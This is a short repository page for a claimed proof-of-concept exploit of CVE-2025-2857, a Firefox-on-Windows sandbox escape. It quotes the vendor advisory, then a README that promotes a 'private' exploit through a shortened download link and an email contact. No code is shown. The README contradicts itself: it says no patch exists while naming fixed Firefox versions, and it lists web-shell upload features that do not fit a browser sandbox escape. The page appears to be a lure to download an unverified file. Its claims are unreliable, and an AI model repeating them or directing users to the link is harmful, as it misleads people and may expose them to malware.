CVE-2025-2857 PoC: Incorrect handle could lead to sandbox escapes

Source
Associated Vulnerability
Title: Incorrect handle could lead to sandbox escapes (CVE-2025-2857)
Description: Following the recent Chrome sandbox escape (CVE-2025-2783), various Firefox developers identified a similar pattern in our IPC code. A compromised child process could cause the parent process to return an unintentionally powerful handle, leading to a sandbox escape. The original vulnerability was being exploited in the wild. *This only affects Firefox on Windows. Other operating systems are unaffected.* This vulnerability was fixed in Firefox 136.0.4, Firefox ESR 128.8.1, and Firefox ESR 115.21.1.
Readme
# CVE-2025-2857

## 📖 Overview
A sandbox escape vulnerability in Firefox on Windows, discovered by Firefox developers. The vulnerability allows attackers to confuse the parent process into leaking handles into unprivileged child processes, potentially breaking the sandbox security model.

## Exploit:
## [Download here](https://tinyurl.com/nanhrvvy)
## Details
+ **CVE ID**: CVE-2025-2857
+ **Published**: 03/27/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **Patch Available**: No official patch yet
+ **CVSS**: 10
## Impact
Critical severity vulnerability that enables attackers to potentially:
- Escape the browser's sandbox protection
- Execute arbitrary code
- Compromise system integrity
- Gain unauthorized access to system resources

This vulnerability specifically targets Firefox on Windows and was being actively exploited in the wild.


## Exploit Features
+ ✅ Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
+ ✅ Version Check – Confirms if the target is vulnerable before exploitation.
+ ✅ Error Handling – Ensures smooth execution even in case of failures.
+ ✅ Session Handling – Uses persistent session management for authentication.
+ ✅ Real-time Feedback – Provides output at each step.



## Contact
+ **For inquiries, please contact: doppler21@outlook.com**
+ **Exploit**: [Download here](https://tinyurl.com/nanhrvvy)
File Snapshot

[4.0K] /data/pocs/1820f6e89b7a327335a6d8903c90169ee129b3ca
└── [1.4K] README.md

0 directories, 1 file